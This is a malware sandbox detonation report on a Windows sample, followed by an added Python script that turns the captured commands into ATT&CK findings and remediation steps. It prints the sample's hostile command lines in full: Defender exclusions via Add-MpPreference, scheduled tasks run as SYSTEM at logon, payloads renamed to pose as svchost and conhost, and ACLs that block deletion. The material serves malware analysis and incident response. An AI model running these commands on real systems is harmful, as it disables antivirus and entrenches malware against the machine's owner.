SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 22:59

Reported

2024-06-20 23:02

Platform

win10v2004-20240611-en

Max time kernel

144s

Max time network

107s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 780 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 780 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 3276 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 4300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\stn.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\stn.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\svchost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\svchost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\conhost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\conhost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\anydesk.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /run /tn "MicrosoftEdgeUpdateTaskList"

C:\Windows\system32\schtasks.exe

schtasks /run /tn "SystemTaskNavigator"

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
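
The command lines above are the sample's batch script replayed step by step: reclaim and delete any earlier copies (takeown, icacls /reset, rm), add Defender exclusions for C:\ProgramData and the staged binaries, copy the payloads out of C:\ProgramData\microsoft under new names, register ONLOGON tasks at highest run level (most as SYSTEM), start two of them immediately, then set +r +s and an ACL that denies delete, write and DAC changes. A detail worth pulling out is that each staged file name is the final name spelled backwards (ksedynA -> Anydesk, nts -> stn, tsohcvs -> svchost, tsohnoc -> conhost). The script below is an added example, not part of this report or of the sandbox's own tooling: it parses a subset of these command lines (copied verbatim as constructed input) and derives the findings an analyst would record. The regexes, the WINDOWS_NATIVE name list and the ATT&CK technique mapping are my own choices.

```python
"""Derive persistence / defense-evasion findings from the command lines the
sandbox captured for this sample's batch script (added example, not part of
the original report; regexes and technique mapping are the editor's own)."""
import re
from pprint import pprint

# Constructed sample input: a subset of the command lines listed in the
# Processes section, verbatim apart from Python string escaping.
SAMPLE_CMDLINES = [
    'takeown /f "C:\\programdata\\svchost.exe"',
    'icacls "C:\\programdata\\svchost.exe" /reset',
    'powershell -c rm "C:\\programdata\\svchost.exe" -r -force',
    'powershell -Command Add-MpPreference -ExclusionPath "C:\\ProgramData"',
    'powershell -Command Add-MpPreference -ExclusionProcess "C:\\ProgramData/svchost.exe"',
    'powershell -Command Add-MpPreference -ExclusionProcess "C:\\ProgramData/microsoft/tsohcvs.exe"',
    'powershell -c Copy-Item "C:\\ProgramData/microsoft/ksedynA.exe" -Destination "C:\\ProgramData/Anydesk.exe" -r -force',
    'powershell -c Copy-Item "C:\\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\\ProgramData/svchost.exe" -r -force',
    'schtasks /Create /TN SystemTaskNavigator /TR "C:\\ProgramData/stn.exe" /RL highest /SC ONLOGON /F',
    'schtasks /Create /TN OneDriveTaskReport /TR "C:\\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F',
    'schtasks /run /tn "SystemTaskNavigator"',
    'attrib +r +s "C:\\ProgramData/svchost.exe"',
    'icacls "C:\\ProgramData/svchost.exe" /setowner "SYSTEM"',
    'icacls "C:\\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)',
]

# Binaries that legitimately live only under %SystemRoot%; a file with one of
# these names outside System32 is treated as masquerading (my own short list).
WINDOWS_NATIVE = {"svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe"}


def norm(path):
    """The script mixes '/' and '\\' and letter case; canonicalise before comparing."""
    return path.replace("/", "\\").lower()


def basename(path):
    return norm(path).rsplit("\\", 1)[-1]


def analyze(cmdlines):
    f = {
        "takeown_targets": set(),    # earlier copies reclaimed before being overwritten
        "defender_exclusions": [],   # paths/processes removed from Defender scanning
        "staged_copies": [],         # (source, destination, source stem == destination stem reversed)
        "scheduled_tasks": [],       # one dict per schtasks /Create
        "tasks_run": [],             # tasks started immediately with schtasks /run
        "acl_lockdown": set(),       # files given a /deny ACE after /setowner
        "masquerading": set(),       # task targets named like Windows binaries outside System32
        "techniques": set(),         # ATT&CK technique IDs the findings map to
    }
    for cmd in cmdlines:
        if m := re.match(r'takeown\s+/f\s+"([^"]+)"', cmd, re.I):
            f["takeown_targets"].add(norm(m.group(1)))
        elif m := re.search(r'Add-MpPreference\s+-Exclusion(?:Path|Process)\s+"([^"]+)"', cmd, re.I):
            f["defender_exclusions"].append(norm(m.group(1)))
            f["techniques"].update({"T1059.001", "T1562.001"})
        elif m := re.search(r'Copy-Item\s+"([^"]+)"\s+-Destination\s+"([^"]+)"', cmd, re.I):
            src, dst = norm(m.group(1)), norm(m.group(2))
            src_stem = basename(src).rsplit(".", 1)[0]
            dst_stem = basename(dst).rsplit(".", 1)[0]
            # Flags the reversed-name staging trick (ksedyna -> anydesk, tsohcvs -> svchost).
            f["staged_copies"].append((src, dst, src_stem[::-1] == dst_stem))
        elif m := re.match(r'schtasks\s+/create\s+/tn\s+(\S+)\s+/tr\s+"([^"]+)"(.*)', cmd, re.I):
            opts = m.group(3).lower()
            sc = re.search(r"/sc\s+(\S+)", opts)
            task = {"name": m.group(1), "target": norm(m.group(2)),
                    "highest": "/rl highest" in opts, "as_system": "/ru system" in opts,
                    "trigger": sc.group(1) if sc else None}
            f["scheduled_tasks"].append(task)
            f["techniques"].add("T1053.005")
            if basename(task["target"]) in WINDOWS_NATIVE and "\\windows\\system32\\" not in task["target"]:
                f["masquerading"].add(task["target"])
                f["techniques"].add("T1036.005")
        elif m := re.match(r'schtasks\s+/run\s+/tn\s+"?([^"\s]+)', cmd, re.I):
            f["tasks_run"].append(m.group(1))
        elif m := re.match(r'icacls\s+"([^"]+)"\s.*\s/deny\s', cmd, re.I):
            f["acl_lockdown"].add(norm(m.group(1)))
            f["techniques"].add("T1222.001")
    return f


if __name__ == "__main__":
    pprint(analyze(SAMPLE_CMDLINES))
```

Run as-is it prints the findings for the embedded subset; feed it the full Processes list and the same logic yields every exclusion, task name, staged pair and locked-down file in one pass, which is what an IR playbook needs to reverse the changes (Remove-MpPreference for each exclusion, Unregister-ScheduledTask for each task name, then takeown and icacls /reset on the locked files before deleting them).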

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
